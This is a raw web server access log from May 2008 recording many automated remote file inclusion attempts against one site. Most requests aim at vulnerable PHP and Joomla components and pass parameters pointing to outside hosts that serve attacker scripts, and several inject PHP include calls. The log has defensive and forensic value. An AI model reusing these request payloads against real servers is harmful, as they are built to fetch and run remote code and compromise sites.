81.13.86.241 - - [19/May/2008:11:32:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
63.223.74.103 - - [19/May/2008:11:32:52 -0700] "GET /logs/access_080327.log/view.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.104.47 - - [19/May/2008:11:32:58 -0700] "GET /logs/access_080310.log//index.php?option=com_gallery&task=view&Itemid=&mosConfig_absolute_path=http://bernd.gebrueder-schell.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.104.47 - - [19/May/2008:11:33:00 -0700] "GET //index.php?option=com_gallery&task=view&Itemid=&mosConfig_absolute_path=http://bernd.gebrueder-schell.de/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.104.47 - - [19/May/2008:11:33:00 -0700] "GET /logs//index.php?option=com_gallery&task=view&Itemid=&mosConfig_absolute_path=http://bernd.gebrueder-schell.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:33:08 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.104.47 - - [19/May/2008:11:33:09 -0700] "GET /logs/access_080412.log//index.php?option=com_gallery&task=view&Itemid=&mosConfig_absolute_path=http://bernd.gebrueder-schell.de/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.251.149.21 - - [19/May/2008:11:33:35 -0700] "GET /logs/access_080327.log//modules/xfsection/modify.php?dir_module=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:33:40 -0700] "GET /logs/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:33:40 -0700] "GET /cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:11:33:43 -0700] "GET /logs/access_080215.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:11:33:44 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:11:33:44 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:34:14 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:34:15 -0700] "GET /logs/access_080312.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:34:17 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:34:18 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:34:18 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:34:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.74.192.227 - - [19/May/2008:11:34:46 -0700] "GET /logs/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.192.227 - - [19/May/2008:11:34:46 -0700] "GET /index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:34:55 -0700] "GET /logs/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.197.120 - - [19/May/2008:11:34:56 -0700] "GET /index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:34:59 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:35:00 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:35:00 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:35:15 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:35:16 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:11:35:17 -0700] "GET /logs/index.php?meio=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
209.172.57.241 - - [19/May/2008:11:35:21 -0700] "GET /index.php?meio=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:35:37 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:35:37 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:35:48 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [19/May/2008:11:35:49 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.130 - - [19/May/2008:11:36:45 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:36:49 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:11:36:49 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.252.82 - - [19/May/2008:11:37:01 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:37:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:11:37:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:37:19 -0700] "GET /logs/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:37:20 -0700] "GET /index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:37:56 -0700] "GET /logs/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.6.122.93 - - [19/May/2008:11:37:57 -0700] "GET /index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:38:15 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:38:16 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:38:19 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:38:29 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.47.201.117 - - [19/May/2008:11:38:30 -0700] "GET /errors.php?error=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:38:40 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:38:40 -0700] "GET /logs//saveserver.php?thisdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:39:01 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:11:39:23 -0700] "GET /logs/access_071230.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:39:26 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:39:27 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.238.52.62 - - [19/May/2008:11:39:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:11:39:35 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:40:02 -0700] "GET /logs/access_080312.log//saveserver.php?thisdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:11:40:05 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://blackcard.newsit.es/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.222.167.228 - - [19/May/2008:11:40:07 -0700] "GET /logs/access_071126.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [19/May/2008:11:40:22 -0700] "GET /logs/access_080327.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tutorials.fyreblade.com/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:40:29 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:40:29 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:40:29 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:40:43 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:41:12 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:41:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:41:33 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [19/May/2008:11:41:34 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.xbmcscripts.com/media/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [19/May/2008:11:41:48 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.117.143.11 - - [19/May/2008:11:42:02 -0700] "GET /logs/index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:42:03 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:42:04 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.117.143.11 - - [19/May/2008:11:42:05 -0700] "GET /index.php?spaw=http://www.eac-finance.com/PhpMyAdmin/mc??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.68" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:42:06 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:42:20 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.68.162 - - [19/May/2008:11:42:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.47rclan.com/ultrastats/include/.bin/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:42:23 -0700] "GET /showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:42:44 -0700] "GET /logs/access_071212.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:42:44 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:42:48 -0700] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [19/May/2008:11:43:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.33.2.131 - - [19/May/2008:11:43:23 -0700] "GET /logs/home.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [19/May/2008:11:43:24 -0700] "GET /home.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:44:02 -0700] "GET /logs/index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/May/2008:11:44:02 -0700] "GET /index1.php?menu=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.165 - - [19/May/2008:11:44:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.165 - - [19/May/2008:11:44:20 -0700] "GET /tmp/sess_48e7ca46bb229847445624531d162420 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:44:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [19/May/2008:11:44:45 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:44:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:11:44:54 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:45:33 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:45:34 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:45:34 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:45:37 -0700] "GET /logs/access_080302.log//podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:45:38 -0700] "GET //podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:45:38 -0700] "GET /logs//podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:45:45 -0700] "GET /logs//podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [19/May/2008:11:45:46 -0700] "GET //podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [19/May/2008:11:45:48 -0700] "GET /logs/page.php5?id=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [19/May/2008:11:45:49 -0700] "GET /page.php5?id=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:11:45:58 -0700] "GET /logs//podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [19/May/2008:11:45:58 -0700] "GET //podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=http://www.snijdersverfenbehang.nl/cache/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:46:03 -0700] "GET /logs/access.log/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.150 - - [19/May/2008:11:46:03 -0700] "GET /logs/showtree.php?tree=Pulfords&&DI=6244&IG=150105148c564b998141cd9e5abdd82d&POS=9&CM=WPU&CE=9&CS=AWP&SR=9&sample=1/historytemplate.php?cms[support]=1&cms[tngpath]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:46:14 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:46:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [19/May/2008:11:46:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:11:46:26 -0700] "GET /logs//redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.63.130.242 - - [19/May/2008:11:46:26 -0700] "GET //redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
212.16.254.7 - - [19/May/2008:11:47:28 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.75.12.148 - - [19/May/2008:11:47:29 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
